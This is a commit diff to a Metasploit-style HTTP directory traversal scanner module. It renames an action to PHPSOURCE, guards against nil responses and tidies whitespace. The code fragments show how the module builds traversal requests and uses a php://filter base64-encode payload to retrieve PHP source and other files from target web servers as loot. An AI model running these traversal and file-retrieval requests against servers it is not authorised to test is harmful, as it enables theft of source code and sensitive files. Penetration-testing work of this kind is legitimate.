Fix nil res bug, change action name, etc

Author: sinn3r

modules/auxiliary/scanner/http/http_traversal.rb

@@ -24,9 +24,8 @@ def initialize(info = {})
 				directory traversal exists in the web server, and then return the path that
 				triggers the vulnerability.  The 'DOWNLOAD' action shares the same ability as
 				'CHECK', but will take advantage of the found trigger to download files based on
-				a 'FILELIST' of your choosing. You also can to download php source code files using PHPDOWNLOAD 
-				based in a crawled list.  
-				The 'WRITABLE' action can be used to determine
+				a 'FILELIST' of your choosing.  The 'PHPSOURCE' action can be used to download
+				source against PHP applications.  The 'WRITABLE' action can be used to determine
 				if the trigger can be used to write files outside the www directory.
 
 					To use the 'COOKIE' option, set your value like so: "name=value".  To use
@@ -45,7 +44,7 @@ def initialize(info = {})
 					['CHECK',    {'Description' => 'Check for basic directory traversal'}],
 					['WRITABLE', {'Description' => 'Check if a traversal bug allows us to write anywhere'}],
 					['DOWNLOAD', {'Description' => 'Attempt to download files after bruteforcing a trigger'}],
-					['PHPDOWNLOAD', {'Description' => 'Attempt to download php source code files'}]
+					['PHPSOURCE', {'Description' => 'Attempt to retrieve php source code files'}]
 				],
 			'DefaultAction'  => 'CHECK'
 		))
@@ -235,7 +234,7 @@ def lfi_download(trigger, files)
 			req = ini_request(uri = (datastore['PATH'] + trigger + f).chop)
 			res = send_request_cgi(req, 25)
 
-			vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
+			vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
 
 			# Only download files that are withint our interest
 			if res and res.to_s =~ datastore['PATTERN']
@@ -249,9 +248,9 @@ def lfi_download(trigger, files)
 		print_status("#{counter.to_s} file(s) downloaded")
 	end
 
-	
+
 	#
-	# Action 'PHPDOWNLOAD': Used to grab the php source code
+	# Action 'PHPSOURCE': Used to grab the php source code
 	#
 	def php_download(files)
 		counter = 0
@@ -262,22 +261,18 @@ def php_download(files)
 			req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop)
 			res = send_request_cgi(req, 25)
 
-			vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
+			vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
 
-			# Only download files that are withint our interest
-			#if res and res.to_s =~ datastore['PATTERN']
-				# We assume the string followed by the last '/' is our file name
-				fname = f.split("/")[-1].chop
-				loot = store_loot("php.data","text/plain",rhost,Rex::Text.decode_base64(res.body),fname)
-				print_good("File #{fname} downloaded to: #{loot}")
-				counter += 1
-			#end
+			# We assume the string followed by the last '/' is our file name
+			fname = f.split("/")[-1].chop
+			loot = store_loot("php.data","text/plain",rhost,Rex::Text.decode_base64(res.body),fname)
+			print_good("File #{fname} downloaded to: #{loot}")
+			counter += 1
 		end
 		print_status("#{counter.to_s} source code file(s) downloaded")
 	end
 
-	
-	
+
 	#
 	# Action 'WRITABLE': This method will attempt to write to a directory outside of www
 	#
@@ -354,18 +349,16 @@ def run_host(ip)
 			return if trigger.nil?
 			is_writable(trigger)
 
-		elsif action.name == 'PHPDOWNLOAD'
+		elsif action.name == 'PHPSOURCE'
 			trigger = ini_trigger
 			return if trigger.nil?
 			files = load_filelist
 			php_download(files)
-		
-				
+
 		elsif action.name == 'DOWNLOAD'
 			trigger = ini_trigger
 			return if trigger.nil?
-			
-		
+
 			# Load up a file list that we wish to download, and then attempt to download them
 			# with our directory traversal trigger
 			files = load_filelist